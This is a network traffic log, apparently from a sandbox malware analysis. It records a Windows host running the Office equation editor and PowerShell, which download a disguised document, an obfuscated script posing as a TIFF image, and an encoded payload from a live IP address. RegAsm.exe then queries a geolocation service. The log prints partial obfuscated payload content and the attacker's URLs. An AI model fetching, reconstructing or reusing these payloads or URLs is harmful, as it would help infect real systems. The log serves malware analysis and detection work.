                                                                                                                        Sep 30, 2024 15:00:12.538079977 CEST1236INData Raw: 5f 36 5f a7 2f 38 3f 32 21 24 60 3f 3f 31 26 34 7c 23 2f 30 28 34 b5 5e 25 2c 28 7e 3d 60 5b 35 25 3f 34 3e 31 2b b0 60 2f 25 2e 5d 33 24 7e 2a 3f 28 3c 5e 3f 5e 26 3f 26 37 21 31 31 3f 37 32 5b 26 33 34 27 5e 40 39 34 2d 7e 3e 36 39 7e 35 3d 35
                                                                                                                        Data Ascii: _6_/8?2!$`??1&4|#/0(4^%,(~=`[5%?4>1+`/%.]3$~*?(<^?^&?&7!11?72[&34'^@94-~>69~5=5?(|]%-%:~79/?#/~|@'>8`8'?97,!/?%_7.?(02!%.#!/]?*.;??3-%?4)75??~,^[6;5&869[?!+|<$_0'?<3%[:)@1`6?>9*1|~,5?.%_-7*?%&??^?=.#=?,]~5)@*`~(;494-(?;*';*?.0&^);
                                                                                                                        Sep 30, 2024 15:00:12.538094044 CEST1236INData Raw: 3e 3d 3a 3b 27 5d 38 35 7c 21 2d 2e 33 5b 3f 3f 32 2b 27 3f 38 3a 33 a7 3f 32 28 40 36 29 25 30 38 30 3f 3f 2a a7 5d 24 26 36 25 3f 3f 3f b0 7c 40 23 38 32 37 30 24 31 a7 3b 34 30 2b 7c 5b 3f 3f b5 5d 5d 7e 7c 2c b0 3a 2a 27 5e 3f 23 29 3b 27 2a
                                                                                                                        Data Ascii: >=:;']85|!-.3[??2+'?8:3?2(@6)%080??*]$&6%???|@#8270$1;40+|[??]]~|,:*'^?#);'*?1!>?7)~~=0).[<[6@*%&0>178#;[8#($-?4~((@^#*3?49`16<^?-??+;7=@`|5)!<!&)?@73$@3*;??;8!&(3'%)-34&~%?6::!-]3=1`76==?6?%#+7//#/@_25#(66=5]]!?9<)'%?.=~6
                                                                                                                        Sep 30, 2024 15:00:12.538109064 CEST1236INData Raw: 4a 6a 70 68 30 31 33 79 5a 4e 39 50 49 52 56 79 7a 4b 33 71 31 61 59 75 56 4c 71 62 75 6f 61 33 6b 31 37 4a 64 65 62 7a 58 4e 4d 35 49 45 64 32 50 4b 4d 33 7a 70 4d 6c 35 41 69 75 43 50 53 58 31 34 4e 49 52 30 45 79 71 63 37 50 63 4c 34 54 75 48
                                                                                                                        Data Ascii: Jjph013yZN9PIRVyzK3q1aYuVLqbuoa3k17JdebzXNM5IEd2PKM3zpMl5AiuCPSX14NIR0Eyqc7PcL4TuH1TdGtflv1BoGlzeINHSyF61VA2Ig3S3coi1lSm42X5nJlYA7NJ6ocpyGPMyfBKSK4AeqRbwPiBGVS1pqhp3OWAqrtzvJiKf0BSvdMzKczWhpaKmPkP6xkjKtNna7zJDurJj1iM18d3nS4rGbC49lU2p6YopNCnVpj
                                                                                                                        Sep 30, 2024 15:00:12.538120031 CEST1236INData Raw: 20 09 09 20 20 20 09 20 09 20 20 09 09 09 20 09 20 09 09 20 09 09 09 20 20 20 20 09 20 09 20 09 20 09 09 09 09 20 20 09 09 35 37 20 20 09 09 20 09 20 09 09 20 20 09 09 09 09 09 20 20 09 20 09 09 20 09 20 20 09 20 20 09 20 20 09 20 20 09 09 20 09
                                                                                                                        Data Ascii: 57 a 0
                                                                                                                        Sep 30, 2024 15:00:12.538134098 CEST1236INData Raw: 09 09 09 20 09 09 09 20 20 20 20 20 09 09 20 20 09 20 09 09 09 20 09 20 09 09 09 09 20 09 09 09 09 20 09 20 09 09 20 09 09 09 20 20 20 20 09 20 09 20 09 20 09 09 09 09 20 20 09 09 30 30 20 20 09 09 09 09 09 09 09 20 20 09 09 20 20 20 09 09 20 09
                                                                                                                        Data Ascii: 00 00000000
                                                                                                                        Sep 30, 2024 15:00:12.542931080 CEST1236INData Raw: 20 09 20 09 20 09 20 09 09 20 20 20 20 20 20 20 09 09 20 09 09 20 20 09 09 09 09 09 09 09 20 09 09 09 09 20 20 09 09 30 31 09 20 09 09 20 20 20 09 20 09 09 20 09 09 09 20 09 20 20 20 20 09 20 09 09 09 20 20 09 20 09 09 09 09 09 20 20 09 09 20 09
                                                                                                                        Data Ascii: 01 08 2b3
                                                                                                                        Sep 30, 2024 15:00:15.015901089 CEST286OUTHEAD /80/uc/seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever.doc HTTP/1.1
                                                                                                                        User-Agent: Microsoft Office Existence Discovery
                                                                                                                        Host: 91.134.96.177
                                                                                                                        Content-Length: 0
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Sep 30, 2024 15:00:15.183512926 CEST322INHTTP/1.1 200 OK
                                                                                                                        Date: Mon, 30 Sep 2024 13:00:15 GMT
                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                        Last-Modified: Mon, 30 Sep 2024 06:43:59 GMT
                                                                                                                        ETag: "1c3d2-62350879de951"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 115666
                                                                                                                        Keep-Alive: timeout=5, max=99
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/msword


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        1192.168.2.224917191.134.96.177803796C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Sep 30, 2024 15:00:15.519577980 CEST347OUTGET /80/picturewithherimagesverygoodforyourheart.tIF HTTP/1.1
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                        Host: 91.134.96.177
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Sep 30, 2024 15:00:16.139849901 CEST1236INHTTP/1.1 200 OK
                                                                                                                        Date: Mon, 30 Sep 2024 13:00:16 GMT
                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                        Last-Modified: Mon, 30 Sep 2024 06:41:22 GMT
                                                                                                                        ETag: "3c504-623507e3e561a"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 247044
                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: image/tiff
                                                                                                                        Data Raw: ff fe 4c 00 6c 00 69 00 6b 00 4e 00 6b 00 66 00 52 00 65 00 43 00 71 00 43 00 4b 00 4c 00 55 00 42 00 47 00 65 00 75 00 63 00 66 00 7a 00 66 00 50 00 20 00 3d 00 20 00 22 00 47 00 4c 00 49 00 6c 00 69 00 66 00 4c 00 55 00 41 00 57 00 6e 00 70 00 68 00 6b 00 47 00 55 00 78 00 41 00 63 00 42 00 4b 00 41 00 4c 00 69 00 22 00 0d 00 0a 00 69 00 66 00 47 00 74 00 4c 00 4b 00 57 00 57 00 55 00 43 00 47 00 50 00 6d 00 4e 00 6d 00 67 00 61 00 6b 00 69 00 7a 00 6f 00 4f 00 57 00 43 00 20 00 3d 00 20 00 22 00 65 00 52 00 4b 00 74 00 57 00 75 00 43 00 47 00 57 00 4b 00 57 00 4b 00 42 00 63 00 4f 00 50 00 6a 00 69 00 50 00 57 00 4f 00 4c 00 6c 00 69 00 22 00 0d 00 0a 00 4b 00 57 00 78 00 7a 00 4c 00 66 00 6b 00 41 00 66 00 4e 00 6d 00 54 00 66 00 57 00 61 00 4c 00 66 00 67 00 54 00 63 00 4f 00 69 00 68 00 69 00 20 00 3d 00 20 00 22 00 4c 00 47 00 4f 00 7a 00 6d 00 42 00 41 00 6a 00 47 00 4c 00 6c 00 51 00 47 00 57 00 6f 00 68 00 66 00 7a 00 57 00 57 00 6b 00 50 00 55 00 73 00 22 00 0d 00 0a 00 43 00 57 00 5a 00 [TRUNCATED]
                                                                                                                        Data Ascii: LlikNkfReCqCKLUBGeucfzfP = "GLIlifLUAWnphkGUxAcBKALi"ifGtLKWWUCGPmNmgakizoOWC = "eRKtWuCGWKWKBcOPjiPWOLli"KWxzLfkAfNmTfWaLfgTcOihi = "LGOzmBAjGLlQGWohfzWWkPUs"CWZpGAblBWhRdKvcNWWhcoAT = "oUaUeWhWcKCTcIdcqahUaRhB"iLUxdzmLuiqxccALCvNcioUA = "GWcNPfNKomLUPJZhOdppCoiK"cLtUNcCxeWZdBTpgULZWqbUK = "OKWWpWloKLfWAPzkUeLLURmW"iuKsxshJcKBnGkmmrGHlChNq = "GkcfUkWihzRzGGCLCUcZPGiW"WuiLKfaWWcGZWZJfIPCZOfhN = "aNbKKbfkWLKzKuCpWRmNfLWL"LqmPKzvmAKGWNNWGAlLi
                                                                                                                        Sep 30, 2024 15:00:16.139875889 CEST1236INData Raw: 00 6f 00 57 00 41 00 6b 00 20 00 3d 00 20 00 22 00 73 00 53 00 5a 00 49 00 63 00 69 00 57 00 4b 00 4c 00 4b 00 4f 00 4c 00 6f 00 57 00 4e 00 62 00 4b 00 43 00 55 00 4c 00 6b 00 74 00 71 00 64 00 22 00 0d 00 0a 00 64 00 51 00 7a 00 4f 00 78 00 64
                                                                                                                        Data Ascii: oWAk = "sSZIciWKLKOLoWNbKCULktqd"dQzOxdzoLkcWcqKeCLqWiecK = "RgNKkecUKLjWbLrdSLAtTxPq"mkNHHLLApciqShioGkeRdWiG = "U
                                                                                                                        Sep 30, 2024 15:00:16.139889956 CEST448INData Raw: 00 54 00 47 00 63 00 41 00 6b 00 52 00 41 00 4c 00 4c 00 6b 00 4c 00 62 00 57 00 57 00 66 00 65 00 63 00 4b 00 57 00 73 00 76 00 22 00 0d 00 0a 00 0d 00 0a 00 64 00 62 00 4e 00 6d 00 48 00 43 00 68 00 5a 00 4f 00 70 00 52 00 4c 00 4b 00 74 00 63
                                                                                                                        Data Ascii: TGcAkRALLkLbWWfecKWsv"dbNmHChZOpRLKtcUZbCfTLNl = "ZCkhGuupoLWUWimLlcBrkWUh"KjisHPKqLBRcctbKxPiLiWLd = "WpIkWGWGGgkm
                                                                                                                        Sep 30, 2024 15:00:16.139899969 CEST1236INData Raw: 00 76 00 4e 00 57 00 4b 00 68 00 47 00 4a 00 6e 00 42 00 6f 00 57 00 70 00 6b 00 57 00 4f 00 6c 00 6d 00 57 00 4f 00 4c 00 4c 00 69 00 57 00 5a 00 22 00 0d 00 0a 00 71 00 71 00 4e 00 75 00 7a 00 66 00 75 00 76 00 78 00 63 00 62 00 68 00 71 00 54
                                                                                                                        Data Ascii: vNWKhGJnBoWpkWOlmWOLLiWZ"qqNuzfuvxcbhqTLofenWhtKA = "LRdmWcCiKdtmUaWzWPNKbUqi"znAbLAKRKPLLksLLUKhGKUUO = "PjicfKLWGaB
                                                                                                                        Sep 30, 2024 15:00:16.139913082 CEST1236INData Raw: 00 57 00 61 00 61 00 57 00 71 00 4e 00 70 00 63 00 69 00 42 00 73 00 5a 00 63 00 22 00 0d 00 0a 00 50 00 63 00 4b 00 64 00 50 00 62 00 62 00 70 00 6d 00 53 00 63 00 4e 00 63 00 41 00 76 00 4c 00 48 00 67 00 62 00 4a 00 6b 00 4c 00 68 00 7a 00 20
                                                                                                                        Data Ascii: WaaWqNpciBsZc"PcKdPbbpmScNcAvLHgbJkLhz = "ZoReaPPfpxdhquKeWfnAWLgW"QKzLAlrNBxkAZeZLznUnKmPL = "eUGIGnoBRjcLkbOpzpUiOh
                                                                                                                        Sep 30, 2024 15:00:16.139925003 CEST1236INData Raw: 00 6b 00 47 00 22 00 0d 00 0a 00 62 00 64 00 69 00 43 00 70 00 6f 00 75 00 6e 00 55 00 4b 00 63 00 57 00 47 00 57 00 41 00 4b 00 57 00 57 00 69 00 71 00 74 00 70 00 6d 00 62 00 20 00 3d 00 20 00 22 00 4c 00 66 00 68 00 4b 00 65 00 63 00 61 00 6b
                                                                                                                        Data Ascii: kG"bdiCpounUKcWGWAKWWiqtpmb = "LfhKecakUzIKcKnfKupKLtAi"kNhlkNzLpPtjPxiRPpxPKPiU = "GipLqCWUNiGLbtfKbLdlGUtb"ULWWRt
                                                                                                                        Sep 30, 2024 15:00:16.139936924 CEST1236INData Raw: 00 4c 00 57 00 41 00 4b 00 6c 00 63 00 7a 00 70 00 53 00 61 00 6b 00 4c 00 68 00 57 00 75 00 6c 00 69 00 75 00 20 00 3d 00 20 00 22 00 4b 00 6c 00 75 00 43 00 57 00 54 00 4a 00 50 00 4b 00 63 00 4c 00 4b 00 4b 00 50 00 6d 00 73 00 49 00 6b 00 7a
                                                                                                                        Data Ascii: LWAKlczpSakLhWuliu = "KluCWTJPKcLKKPmsIkzgHbbA"WHiGpuWChcnnkKNiNBLbWNNu = "LhmWlkPWNkBkzLGunqegLmRS"cmfhKLKNebLaoRcnz
                                                                                                                        Sep 30, 2024 15:00:16.139954090 CEST1236INData Raw: 00 6e 00 6b 00 66 00 52 00 55 00 4e 00 4e 00 71 00 7a 00 4c 00 20 00 3d 00 20 00 22 00 61 00 6b 00 47 00 55 00 57 00 73 00 4c 00 70 00 47 00 51 00 6a 00 7a 00 61 00 4e 00 4e 00 65 00 4c 00 57 00 55 00 50 00 41 00 52 00 57 00 55 00 22 00 0d 00 0a
                                                                                                                        Data Ascii: nkfRUNNqzL = "akGUWsLpGQjzaNNeLWUPARWU"KcqppuqxiPBKGGkxlAKzKxLj = "WUGGLcLkkLebWUIBdHLxGsBx"GGtPWKKscKhrLaLhWhgqJtp
                                                                                                                        Sep 30, 2024 15:00:16.139966011 CEST1236INData Raw: 00 6f 00 72 00 6a 00 5a 00 20 00 3d 00 20 00 22 00 57 00 51 00 6b 00 68 00 62 00 50 00 57 00 65 00 69 00 4c 00 66 00 5a 00 47 00 64 00 7a 00 62 00 53 00 66 00 7a 00 7a 00 57 00 57 00 63 00 70 00 22 00 0d 00 0a 00 0d 00 0a 00 6f 00 62 00 52 00 41
                                                                                                                        Data Ascii: orjZ = "WQkhbPWeiLfZGdzbSfzzWWcp"obRAPmRLzkkWfjQjLhzcZWWA = "WBZmAvSifGocUlbklheiLhsc"iLPbWLhbpmULiKQGbWRtLqcz = "R
                                                                                                                        Sep 30, 2024 15:00:16.139981985 CEST1236INData Raw: 00 75 00 71 00 68 00 4c 00 7a 00 20 00 3d 00 20 00 22 00 57 00 4b 00 66 00 76 00 50 00 63 00 47 00 74 00 69 00 4c 00 55 00 6e 00 6d 00 6a 00 65 00 47 00 69 00 68 00 57 00 66 00 4c 00 57 00 50 00 61 00 22 00 0d 00 0a 00 6c 00 5a 00 63 00 41 00 72
                                                                                                                        Data Ascii: uqhLz = "WKfvPcGtiLUnmjeGihWfLWPa"lZcArWbiOZeWUPLoKhRIcjmb = "lctdOiZNakSfAmKPPLbCQifL"hjUvniAgkGqPaWPWWobAWRpL = "mA
                                                                                                                        Sep 30, 2024 15:00:16.144805908 CEST1236INData Raw: 00 4b 00 72 00 57 00 7a 00 54 00 7a 00 55 00 50 00 62 00 6d 00 4c 00 4b 00 69 00 4b 00 4c 00 57 00 62 00 66 00 63 00 41 00 57 00 4c 00 22 00 0d 00 0a 00 47 00 4e 00 61 00 47 00 50 00 65 00 57 00 57 00 4c 00 57 00 69 00 41 00 6c 00 48 00 49 00 74
                                                                                                                        Data Ascii: KrWzTzUPbmLKiKLWbfcAWL"GNaGPeWWLWiAlHItZonzenaruKKza = "piALKWfWeoKPWtGibKLonlji"cHCdLUmPKcQWZqUZNpkonzenarZLW = "bLi


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        2192.168.2.224917391.134.96.177804032C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Sep 30, 2024 15:00:24.229175091 CEST76OUTGET /80/WRRDFC.txt HTTP/1.1
                                                                                                                        Host: 91.134.96.177
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Sep 30, 2024 15:00:24.857707024 CEST1236INHTTP/1.1 200 OK
                                                                                                                        Date: Mon, 30 Sep 2024 13:00:24 GMT
                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                        Last-Modified: Mon, 30 Sep 2024 06:38:44 GMT
                                                                                                                        ETag: "a1000-6235074c9d7b5"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 659456
                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: text/plain
                                                                                                                        Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78 41 48 41 41 41 41 6a 41 63 41 45 41 34 44 74 2b 41 71 50 59 36 44 68 2b 77 6e 50 30 35 44 62 2b 67 6d 50 67 35 44 54 2b 51 6b 50 77 34 44 4b 2b 41 69 50 59 34 44 46 2b 41 68 50 4d 34 44 43 2b 41 51 50 38 33 44 39 39 41 65 50 59 33 44 78 39 77 62 50 30 32 44 72 39 67 [TRUNCATED]
                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwDq8gIPsxDT8wCPIsD/7w9OwuDl7Q3OUtDM7AhOsrDz6wqOMqDb6QkOooDE6ggOEoDA5wfO4nD95A6M0MDMyQqMgKDhyAoM8JDcyglMIJDOygiMYED6xgdMUHD0xwcMIHDxxAcM8GDuxwaMoGDpxAaMcGDmxQZMQGDjxgYM4FDdxAHAAAAjAcAEA4Dt+AqPY6Dh+wnP05Db+gmPg5DT+QkPw4DK+AiPY4DF+AhPM4DC+AQP83D99AePY3Dx9wbP02Dr9gYPA2De9QXPY1DO9QTPYwD+8gNP4yDm8gHPYxDO8gxO4vD27g7OYuDe7g1O4sDG6gvOYrDu6gpO4pDW6gjO0oDG5gfOYnDu5gZO8lDe5AXOQlDM5ABOwjD04ALOQiDc4AFOwgDF4gwNofDy3g6NIeDa3g0NocDC2QvNsbD62AuNYbD02wsNgaDm2woNoZDW2QlN4YDN2whNYYDE1QfNwXD61AZNEWDZ1gVNQVDP1QTNwUDL1QSNcUDF1AAN4TD90APNoTD40gNNETDv0gKNgSDn0gJNQSDi0AINsRDZ0AGNYRDU0gENERDK0QCNMMD/zg8MAPDtzQ6MwNDazw1MMNDGzAxMEID9yAsM4KDrywpMoJDYyQlMEJDEygQM8HD7xgbMwGDpxQZMgFDWxwUM8EDCxAAM0DD7wQOMwCDqwwJMUCDjwgFMQBDRwwDM0ADAAAQAQCgBgDwP4/D7/w9Po+Do/Q5PE+DU/g0P88DL/wxPI4Dx+wrPw6Do+ApP85DO+AjPk4DF9AePYnDi5AXOolDZ5AWOQlDT5wTOkkDH5gROUkDE5wQOIgD+4QPOkjDz4QMOAjDv4
                                                                                                                        Sep 30, 2024 15:00:24.857729912 CEST224INData Raw: 67 4c 4f 30 69 44 73 34 41 4b 4f 63 69 44 6a 34 51 48 4f 73 68 44 61 34 51 47 4f 67 68 44 58 34 77 45 4f 49 68 44 4f 34 41 43 4f 59 67 44 46 34 41 42 4f 4d 67 44 43 33 67 2f 4e 30 66 44 35 33 77 38 4e 45 66 44 77 33 77 37 4e 73 65 44 71 33 67 35
                                                                                                                        Data Ascii: gLO0iDs4AKOciDj4QHOshDa4QGOghDX4wEOIhDO4ACOYgDF4ABOMgDC3g/N0fD53w8NEfDw3w7NseDq3g5NUeDh3w2NkdDY3A1N4cDM3wyNocDJ3QhN8bD+2AuNYbD12AtNMbDy2grN0aDp2woNEaDg2AnNsZDX2QkN8YDO2QjNkYDI2ARN4XD81weNoXD51QdNQXDw1gaNgWDn1gZNUWDh1AYNwVDW1
                                                                                                                        Sep 30, 2024 15:00:24.857741117 CEST1236INData Raw: 41 56 4e 4d 56 44 53 31 67 54 4e 30 55 44 4a 31 77 51 4e 45 55 44 41 30 77 50 4e 34 54 44 36 30 51 4f 4e 55 54 44 76 30 51 4c 4e 77 53 44 72 30 77 4a 4e 59 53 44 69 30 41 48 4e 6f 52 44 5a 30 51 46 4e 51 52 44 51 30 67 43 4e 67 51 44 48 30 77 41
                                                                                                                        Data Ascii: AVNMVDS1gTN0UDJ1wQNEUDA0wPN4TD60QONUTDv0QLNwSDr0wJNYSDi0AHNoRDZ0QFNQRDQ0gCNgQDH0wANIMD8zw+MoPD5zA9MIPDxAAQAcBgBQDQOokDJAAAAMAgBADAAA0D8AAAAMAgBwCAOwjD64QJOQiDj4gFO4gDF3w/N4fD63A9NYeDi3w2NodDS3Q0NAdDPAAAAwAgBQCgNAZDP1AcN8WDu1QbNwWDr1gaNcWDm1QZN
                                                                                                                        Sep 30, 2024 15:00:24.857752085 CEST1236INData Raw: 6e 44 76 35 51 62 4f 73 6d 44 70 35 77 5a 4f 55 6d 44 6a 35 51 59 4f 38 6c 44 64 35 77 57 4f 6b 6c 44 58 35 51 56 4f 4d 6c 44 52 35 77 54 4f 30 6b 44 4c 35 51 53 4f 63 6b 44 46 35 77 51 4f 45 67 44 2f 34 51 50 4f 73 6a 44 35 34 77 4e 4f 55 6a 44
                                                                                                                        Data Ascii: nDv5QbOsmDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4wKOkiDn4QJOMiDh4wHO0hDb4QGOchDV4wEOEhDP4QDOsgDJ4wBOUgDD4QwN8fD93w+NkfD33Q9NMfDx3w7N0eDr3Q6NceDl3w4NEeDf3Q3NsdDZ3w1NUdDT3Q0N8cDN3wyNkcDH3QxNMcDB2wvN0bD7
                                                                                                                        Sep 30, 2024 15:00:24.857763052 CEST1236INData Raw: 77 6e 4f 34 70 44 64 36 41 6e 4f 73 70 44 61 36 51 6d 4f 67 70 44 58 36 67 6c 4f 55 70 44 55 36 77 6b 4f 49 70 44 52 36 41 6b 4f 38 6f 44 4f 36 51 6a 4f 77 6f 44 4c 36 67 69 4f 6b 6f 44 49 36 77 68 4f 59 6f 44 46 36 41 68 4f 4d 6f 44 43 36 51 67
                                                                                                                        Data Ascii: wnO4pDd6AnOspDa6QmOgpDX6glOUpDU6wkOIpDR6AkO8oDO6QjOwoDL6giOkoDI6whOYoDF6AhOMoDC6QgOAkD/5gfO0nD85weOonD55AeOcnD25QdOQnDz5gcOEnDw5wbO4mDt5AbOsmDq5QaOgmDn5gZOUmDk5wYOImDh5AYO8lDe5QXOwlDX5gVOUlDU4QGOghDX4gFAAAA4AUAwAAAA1AdNIXDw1gbNwWDq1AaNYWDk1gYN
                                                                                                                        Sep 30, 2024 15:00:24.857783079 CEST1236INData Raw: 6b 44 2f 35 51 66 4f 73 6e 44 35 35 77 64 4f 55 6e 44 7a 35 51 63 4f 38 6d 44 74 35 77 61 4f 6b 6d 44 6e 35 51 5a 4f 4d 6d 44 68 35 77 58 4f 30 6c 44 62 35 51 57 4f 63 6c 44 56 35 77 55 4f 45 6c 44 50 35 51 54 4f 73 6b 44 4a 35 77 52 4f 55 6b 44
                                                                                                                        Data Ascii: kD/5QfOsnD55wdOUnDz5QcO8mDt5waOkmDn5QZOMmDh5wXO0lDb5QWOclDV5wUOElDP5QTOskDJ5wROUkDD5QAO8jD94wOOkjD34QNOMjDx4wLO0iDr4QKOciDl4wIOEiDf4QHOshDZ4wFOUhDT4QEO8gDN4wCOkgDH4QBOMgDB3w/N0fD73Q+NcfD13w8NEfDv3Q7NseDp3w5MAPDvzg7M0ODszw6MoODpzA6McODmzQ5MQODj
                                                                                                                        Sep 30, 2024 15:00:24.857795000 CEST1236INData Raw: 6f 39 50 77 2b 54 61 2f 6b 30 50 39 38 54 4d 2f 30 78 50 52 34 7a 72 2b 63 71 50 4a 36 54 67 2b 6b 6e 50 78 35 54 61 2b 6f 52 50 2b 7a 54 63 38 63 47 50 39 77 44 4d 37 34 38 4f 39 75 7a 74 37 49 37 4f 73 75 6a 6a 37 55 34 4f 38 74 7a 5a 36 4d 75
                                                                                                                        Data Ascii: o9Pw+Ta/k0P98TM/0xPR4zr+cqPJ6Tg+knPx5Ta+oRP+zTc8cGP9wDM748O9uzt7I7Osujj7U4O8tzZ6MuOKrjg6AnOjpDW6QjOEkz950dOyljM48zN/az4245MgPj2xobMxFTTxoTMuEjIxYBMRDTuw4IMvBDXwAFMEBzHAAAAMCQBgBAAA8D9/I7Pp+zo/g5PN+zc/00Pz8TA+ktPp6Tk+4iPS0zt9waPO2Dh9EXPmtDV6UcO
                                                                                                                        Sep 30, 2024 15:00:24.857806921 CEST1236INData Raw: 74 7a 49 37 73 78 4f 51 73 7a 42 36 45 76 4f 62 72 44 6f 36 55 70 4f 4d 71 7a 57 36 4d 56 4f 47 6e 54 74 35 55 61 4f 64 6d 44 6a 35 77 48 4f 37 68 6a 4a 34 59 78 4e 35 66 54 68 32 41 74 4e 70 56 54 34 31 51 5a 4e 4a 57 54 64 31 67 56 4e 68 51 7a
                                                                                                                        Data Ascii: tzI7sxOQszB6EvObrDo6UpOMqzW6MVOGnTt5UaOdmDj5wHO7hjJ4YxN5fTh2AtNpVT41QZNJWTd1gVNhQz3046MyOzozc5MHOjazI2M4IT4yUtMJLTtykqMHJzPyEiMZITEykQM9GjXxYBM6DDvwILMQCDfw8FMwATGAAAA8CABQDAAA8j6/U9PF+TY+glP00ji9AUPjwD88gNPPxzN8syO1vj47Q6OVujV6EvOXqDj68nOcpjP
                                                                                                                        Sep 30, 2024 15:00:24.857816935 CEST1236INData Raw: 77 39 4d 4c 50 54 71 7a 38 35 4d 53 4f 54 69 7a 38 32 4d 65 4e 54 4b 7a 41 79 4d 50 4d 7a 41 79 67 75 4d 58 4c 6a 6f 79 73 70 4d 75 4a 7a 5a 78 34 61 4d 79 45 6a 48 77 49 43 41 41 45 41 6b 41 51 41 67 41 41 41 41 2f 63 39 50 6e 2b 6a 64 2f 59 53
                                                                                                                        Data Ascii: w9MLPTqz85MSOTiz82MeNTKzAyMPMzAyguMXLjoyspMuJzZx4aMyEjHwICAAEAkAQAgAAAA/c9Pn+jd/YSPzxzS4kIOlUj+0MLNvSzq0cKNjSzn0sJNXKT4yQoMVFj6wcLMFCAAAgDAEAHAAAgP77D8+4QPk3ju90YP71zB8s0OzvTy7M6O9tDO4wCOagDFyUmMfFD7xYeMIGTWx8UMFBAAAwDAEAGAAAgPg3D49kBP/zD78INP
                                                                                                                        Sep 30, 2024 15:00:24.857829094 CEST1236INData Raw: 52 44 51 30 77 44 4e 34 51 44 4e 30 41 7a 4d 6e 4f 44 4d 7a 77 79 4d 6f 4d 44 4a 7a 41 79 4d 63 4d 44 47 7a 51 68 4d 2f 4a 44 43 79 51 67 4d 41 45 44 2f 78 67 66 4d 30 48 44 38 78 77 65 4d 6a 42 41 41 41 51 47 41 44 41 4e 41 41 41 77 50 50 2f 54
                                                                                                                        Data Ascii: RDQ0wDN4QDN0AzMnODMzwyMoMDJzAyMcMDGzQhM/JDCyQgMAED/xgfM0HD8xweMjBAAAQGADANAAAwPP/Tv/s5PJ+Ta/QlP30je2gcNMND0zYiMVLDzygrMcJTUyMkM1IDKyIRM9Hj2xMcMuGjnxAZMEGDexoWMbFTQwUCAAAATAMAwAAAA+sqPr0Tl94YPf0DF8cPPHzTt8IIP1xza70HAAAAJAMAsAkjs5gaOelDV5ESOUgjZ
                                                                                                                        Sep 30, 2024 15:00:24.862813950 CEST1236INData Raw: 55 42 50 52 7a 44 78 38 30 4c 50 33 79 54 73 38 41 4b 50 44 79 6a 62 38 67 47 50 67 78 7a 53 38 34 44 50 79 77 44 4a 37 38 66 4f 4e 6d 6a 68 35 6f 58 4f 69 68 6a 36 34 34 4e 4f 35 67 7a 4d 33 6f 39 4e 50 66 54 67 33 49 33 4e 73 64 44 5a 33 67 67
                                                                                                                        Data Ascii: UBPRzDx80LP3yTs8AKPDyjb8gGPgxzS84DPywDJ78fONmjh5oXOihj644NO5gzM3o9NPfTg3I3NsdDZ3ggNgbzW24iNpYDF18fNjXTz1UcN8Wzq1wANtTD20sMN7Sjp0MFNFRDH0kwMwPT1zU8M9ODpzo3MqNjYzo0MqMjCyktMBLjoycoMqJzSy4iMpIjFywgMCED/xcfMsHD5xwdMUHTzxYcM/GDuxEbMqGzox0ZMXGTkxsYM


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        3192.168.2.2249176178.237.33.50803036C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Sep 30, 2024 15:00:27.209367037 CEST71OUTGET /json.gp HTTP/1.1
